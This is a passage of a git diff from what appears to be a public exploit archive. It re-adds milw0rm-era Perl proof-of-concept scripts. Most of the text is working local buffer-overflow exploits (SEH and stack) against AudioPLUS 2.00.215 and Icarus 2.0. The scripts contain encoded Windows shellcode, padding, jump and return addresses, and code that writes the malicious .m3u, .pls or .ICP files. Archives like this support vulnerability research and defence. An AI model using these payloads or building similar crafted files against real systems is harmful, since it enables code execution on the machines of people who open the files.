+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c". +"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58". +"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44". +"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38". +"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33". +"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47". +"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a". +"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b". 
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53". +"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57". +"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39". +"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46". +"\x4e\x46\x43\x36\x42\x50\x5a"; +my $pad1="D_Z"; #trick track +my $junk="\x41" x (4088-length($shellcode)); +my $jmp="\xE9\x03\xF0\xFF\xFF"; +my $pad2="\x42"x 12; +my $next_seh="\xEB\xED\x41\x42"; +my $seh="\xB4\x28\x40\x00"; + +open(myfile,'>>exploit.m3u'); +print myfile $pad1.$shellcode.$junk.$jmp.$pad2.$next_seh.$seh; + +# milw0rm.com [2009-06-30] diff --git a/platforms/windows/local/905.c b/platforms/windows/local/905.c index c1f749adf..64fe37170 100755 --- a/platforms/windows/local/905.c +++ b/platforms/windows/local/905.c @@ -134,6 +134,6 @@ printf("=====Computername, Local Buffer Overflow Exploit=========\n"); printf("======coded by class101=======[Hat-Squad.com 2005]=====\n"); printf("============================================\n"); printf(" \n"); -} - -// milw0rm.com [2005-04-01] +} + +// milw0rm.com [2005-04-01] diff --git a/platforms/windows/local/9064.pl b/platforms/windows/local/9064.pl index 9e1764504..184480f6c 100755 --- a/platforms/windows/local/9064.pl +++ b/platforms/windows/local/9064.pl 
@@ -1,42 +1,42 @@ -#!/usr/bin/perl -# by hack4love -# hack4love@hotmail.com -# AudioPLUS 2.00.215 (.m3u / .lst File) Local buffer Overflow (seh) -# # Greetz to all my friends -# form egypt -## easy :d -## Tested on: Windows XP Pro SP2 (EN) -################################################################ -my $bof="\x41" x 4116; -my $nsh="\xEB\x06\x90\x90"; -my $seh="\xb8\x15\xd1\x72"; -my $nop="\x90" x 20; -my $sec= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". 
-"\x4e\x56\x43\x46\x42\x30\x5a"; -################################################################### -open(myfile,'>> hack4love.m3u'); -print myfile $bof.$nsh.$seh.$nop.$sec; -################################################################### - -# milw0rm.com [2009-07-01] +#!/usr/bin/perl +# by hack4love +# hack4love@hotmail.com +# AudioPLUS 2.00.215 (.m3u / .lst File) Local buffer Overflow (seh) +# # Greetz to all my friends +# form egypt +## easy :d +## Tested on: Windows XP Pro SP2 (EN) +################################################################ +my $bof="\x41" x 4116; +my $nsh="\xEB\x06\x90\x90"; +my $seh="\xb8\x15\xd1\x72"; +my $nop="\x90" x 20; +my $sec= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". 
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +################################################################### +open(myfile,'>> hack4love.m3u'); +print myfile $bof.$nsh.$seh.$nop.$sec; +################################################################### + +# milw0rm.com [2009-07-01] diff --git a/platforms/windows/local/9070.pl b/platforms/windows/local/9070.pl index e7c9ca7d2..a4ea0e819 100755 --- a/platforms/windows/local/9070.pl +++ b/platforms/windows/local/9070.pl 
@@ -1,35 +1,35 @@
-#!/usr/bin/perl
-# AudioPLUS 2.00.215 (.pls) Local buffer Overflow (seh)
-print "AudioPLUS 2.00.215 (.pls) Local buffer Overflow (seh)\n";
-my $header = "[playlist]\x0ANumberOfEntries=1\x0AFile1=http://";
-my $junk="\x41" x 4103;
-my $nseh="\xEB\x06\x90\x90";
-my $seh="\x35\x2F\xD1\x72"; # jmp msacm32.drv ebx
-my $nop="\x90" x 20;
-my $shellcode=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-open(myfile,'>> exploit.pls');
-print myfile $header.$junk.$nseh.$seh.$nop.$shellcode;
-
-# milw0rm.com [2009-07-01]
+#!/usr/bin/perl
+# AudioPLUS 2.00.215 (.pls) Local buffer Overflow (seh)
+print "AudioPLUS 2.00.215 (.pls) Local buffer Overflow (seh)\n";
+my $header = "[playlist]\x0ANumberOfEntries=1\x0AFile1=http://";
+my $junk="\x41" x 4103;
+my $nseh="\xEB\x06\x90\x90";
+my $seh="\x35\x2F\xD1\x72"; # jmp msacm32.drv ebx
+my $nop="\x90" x 20;
+my $shellcode=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a"; +open(myfile,'>> exploit.pls'); +print myfile $header.$junk.$nseh.$seh.$nop.$shellcode; + +# milw0rm.com [2009-07-01] diff --git a/platforms/windows/local/912.c b/platforms/windows/local/912.c index 3344c5dc5..7ada08a02 100755 --- a/platforms/windows/local/912.c +++ b/platforms/windows/local/912.c @@ -65,6 +65,6 @@ printf("GetDataBack for NTFS v2.31 is not installed on your system!\n"); } return 0; -} - -// milw0rm.com [2005-04-04] +} + +// milw0rm.com [2005-04-04] diff --git a/platforms/windows/local/9146.pl b/platforms/windows/local/9146.pl index 3d7629d21..b9952ea3c 100755 --- a/platforms/windows/local/9146.pl +++ b/platforms/windows/local/9146.pl 
@@ -1,67 +1,66 @@
-
-#!/usr/bin/perl
-#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
-# Icarus 2.0 Local Stack-based Buffer overflow Exploit #
-# By : [0]x80->[H]4x²0r #
-# Contact : hashteck[at]Gmail[dot]com #
-# From : Morocco #
-# PoC by : ThE g0bL!N #
-#[+]--------------------------------------------------------------------------------------[+]#
-# Program : Icarus 2.0 #
-#[+]--------------------------------------------------------------------------------------[+]#
-# Tested Under Win$hit 6.0 Vista Pro #
-#[+]--------------------------------------------------------------------------------------[+]#
-##############################################################################################
-##################################### Proud to be HACKER ###################################
-##############################################################################################
-#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
-# #
-#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
-# Put the file generated by this exploit in Icarus Directory ( After you made a back up of #
-# the original file ) then launch Icarus.exe and b000m , calc.exe is launched #
-#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
-# #
-#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#
-# Note : The shellcode is encoded with Alpha2 . The program don't accept non-encoded #
-# Shellcode . I'm too lazy to figure that out now , i you find something contact me ! #
-#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#
-
-
-$Header="server=" ;
-$junk="\x41" x 528;
-$EIP = "\x28\x55\x3D\x72"; # 0x723D5528 -- DSOUND.DLL -- CALL ESP
-$NOPS = "\x90" x 20 ;
-# win32_exec - EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
-$shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49".
-"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x4a".
-"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x5a\x41\x42\x32\x42\x41\x32".
-"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x78\x69\x79\x6c\x4b".
-"\x58\x71\x54\x53\x30\x65\x50\x35\x50\x4e\x6b\x33\x75\x67\x4c\x6e".
-"\x6b\x51\x6c\x33\x35\x50\x78\x66\x61\x5a\x4f\x6e\x6b\x50\x4f\x32".
-"\x38\x6c\x4b\x33\x6f\x41\x30\x35\x51\x48\x6b\x37\x39\x6c\x4b\x45".
-"\x64\x6e\x6b\x56\x61\x7a\x4e\x56\x51\x6f\x30\x4c\x59\x4e\x4c\x4b".
-"\x34\x4f\x30\x50\x74\x57\x77\x48\x41\x39\x5a\x76\x6d\x33\x31\x79".
-"\x52\x6a\x4b\x6b\x44\x37\x4b\x42\x74\x74\x64\x55\x54\x50\x75\x6b".
-"\x55\x4c\x4b\x61\x4f\x67\x54\x46\x61\x6a\x4b\x52\x46\x6e\x6b\x74".
-"\x4c\x50\x4b\x4c\x4b\x53\x6f\x45\x4c\x76\x61\x38\x6b\x6e\x6b\x77".
-"\x6c\x6c\x4b\x75\x51\x38\x6b\x6f\x79\x61\x4c\x54\x64\x75\x54\x6b".
-"\x73\x56\x51\x4f\x30\x33\x54\x6e\x6b\x53\x70\x36\x50\x4c\x45\x6f".
-"\x30\x53\x48\x54\x4c\x4c\x4b\x71\x50\x66\x6c\x6c\x4b\x32\x50\x47".
-"\x6c\x6e\x4d\x4c\x4b\x70\x68\x45\x58\x7a\x4b\x77\x79\x4c\x4b\x6f".
-"\x70\x4c\x70\x67\x70\x35\x50\x37\x70\x4c\x4b\x43\x58\x77\x4c\x43".
-"\x6f\x74\x71\x59\x66\x63\x50\x42\x76\x6c\x49\x6a\x58\x4d\x53\x59".
-"\x50\x61\x6b\x50\x50\x71\x78\x63\x4e\x48\x58\x39\x72\x51\x63\x32".
-"\x48\x4f\x68\x4b\x4e\x6e\x6a\x46\x6e\x61\x47\x4b\x4f\x6a\x47\x73".
-"\x53\x62\x41\x42\x4c\x55\x33\x67\x70\x4a";
-#
-#
-#
-open(myfile,'>>GUEST.ICP');
-print myfile $Header.$junk.$EIP.$NOPS.$shellcode;
-
-#----------------------------------------------------------------------------------#
-# Welcome back Milw0rm & tnx to str0ke for his great j0b !!!11111oneleven11!!
-#----------------------------------------------------------------------------------#
-
-# milw0rm.com [2009-07-14]
+#!/usr/bin/perl
+#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
+# Icarus 2.0 Local Stack-based Buffer overflow Exploit #
+# By : [0]x80->[H]4x²0r #
+# Contact : hashteck[at]Gmail[dot]com #
+# From : Morocco #
+# PoC by : ThE g0bL!N #
+#[+]--------------------------------------------------------------------------------------[+]#
+# Program : Icarus 2.0 #
+#[+]--------------------------------------------------------------------------------------[+]#
+# Tested Under Win$hit 6.0 Vista Pro #
+#[+]--------------------------------------------------------------------------------------[+]#
+##############################################################################################
+##################################### Proud to be HACKER ###################################
+##############################################################################################
+#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
+# #
+#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
+# Put the file generated by this exploit in Icarus Directory ( After you made a back up of #
+# the original file ) then launch Icarus.exe and b000m , calc.exe is launched #
+#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
+# #
+#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#
+# Note : The shellcode is encoded with Alpha2 . The program don't accept non-encoded #
+# Shellcode . I'm too lazy to figure that out now , i you find something contact me ! #
+#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#
+
+
+$Header="server=" ;
+$junk="\x41" x 528;
+$EIP = "\x28\x55\x3D\x72"; # 0x723D5528 -- DSOUND.DLL -- CALL ESP
+$NOPS = "\x90" x 20 ;
+# win32_exec - EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
+$shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49".
+"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x4a".
+"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x5a\x41\x42\x32\x42\x41\x32".
+"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x78\x69\x79\x6c\x4b".
+"\x58\x71\x54\x53\x30\x65\x50\x35\x50\x4e\x6b\x33\x75\x67\x4c\x6e".
+"\x6b\x51\x6c\x33\x35\x50\x78\x66\x61\x5a\x4f\x6e\x6b\x50\x4f\x32".
+"\x38\x6c\x4b\x33\x6f\x41\x30\x35\x51\x48\x6b\x37\x39\x6c\x4b\x45".
+"\x64\x6e\x6b\x56\x61\x7a\x4e\x56\x51\x6f\x30\x4c\x59\x4e\x4c\x4b".
+"\x34\x4f\x30\x50\x74\x57\x77\x48\x41\x39\x5a\x76\x6d\x33\x31\x79".
+"\x52\x6a\x4b\x6b\x44\x37\x4b\x42\x74\x74\x64\x55\x54\x50\x75\x6b".
+"\x55\x4c\x4b\x61\x4f\x67\x54\x46\x61\x6a\x4b\x52\x46\x6e\x6b\x74".
+"\x4c\x50\x4b\x4c\x4b\x53\x6f\x45\x4c\x76\x61\x38\x6b\x6e\x6b\x77".
+"\x6c\x6c\x4b\x75\x51\x38\x6b\x6f\x79\x61\x4c\x54\x64\x75\x54\x6b".
+"\x73\x56\x51\x4f\x30\x33\x54\x6e\x6b\x53\x70\x36\x50\x4c\x45\x6f".
+"\x30\x53\x48\x54\x4c\x4c\x4b\x71\x50\x66\x6c\x6c\x4b\x32\x50\x47".
+"\x6c\x6e\x4d\x4c\x4b\x70\x68\x45\x58\x7a\x4b\x77\x79\x4c\x4b\x6f".
+"\x70\x4c\x70\x67\x70\x35\x50\x37\x70\x4c\x4b\x43\x58\x77\x4c\x43".
+"\x6f\x74\x71\x59\x66\x63\x50\x42\x76\x6c\x49\x6a\x58\x4d\x53\x59".
+"\x50\x61\x6b\x50\x50\x71\x78\x63\x4e\x48\x58\x39\x72\x51\x63\x32".
+"\x48\x4f\x68\x4b\x4e\x6e\x6a\x46\x6e\x61\x47\x4b\x4f\x6a\x47\x73".
+"\x53\x62\x41\x42\x4c\x55\x33\x67\x70\x4a";
+#
+#
+#
+open(myfile,'>>GUEST.ICP');
+print myfile $Header.$junk.$EIP.$NOPS.$shellcode;
+
+#----------------------------------------------------------------------------------#
+# Welcome back Milw0rm & tnx to str0ke for his great j0b !!!11111oneleven11!!
+#----------------------------------------------------------------------------------#
+
+# milw0rm.com [2009-07-14]
diff --git a/platforms/windows/local/9149.pl b/platforms/windows/local/9149.pl
index 26bd27968..3265c258b 100755
--- a/platforms/windows/local/9149.pl
+++ b/platforms/windows/local/9149.pl
@@ -1,45 +1,45 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# Icarus 2.0 (.ICP File) Local buffer Overflow (seh)
-# # Greetz to all my friends
-# form egypt
-## easy :d ###PoC by : ThE g0bL!N
-## this work sooooooooo good
-## USAGE put the file GUEST.ICP in Icarus Directory
-## Tested on: Windows XP Pro SP2 (EN)
-################################################################
-my $bof="\x41" x 18204;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\xb8\x15\xd1\x72";
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-print $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-open(myfile,'>> GUEST.ICP');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-07-15]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# Icarus 2.0 (.ICP File) Local buffer Overflow (seh)
+# # Greetz to all my friends
+# form egypt
+## easy :d ###PoC by : ThE g0bL!N
+## this work sooooooooo good
+## USAGE put the file GUEST.ICP in Icarus Directory
+## Tested on: Windows XP Pro SP2 (EN)
+################################################################
+my $bof="\x41" x 18204;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\xb8\x15\xd1\x72";
+my $nop="\x90" x 20;
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
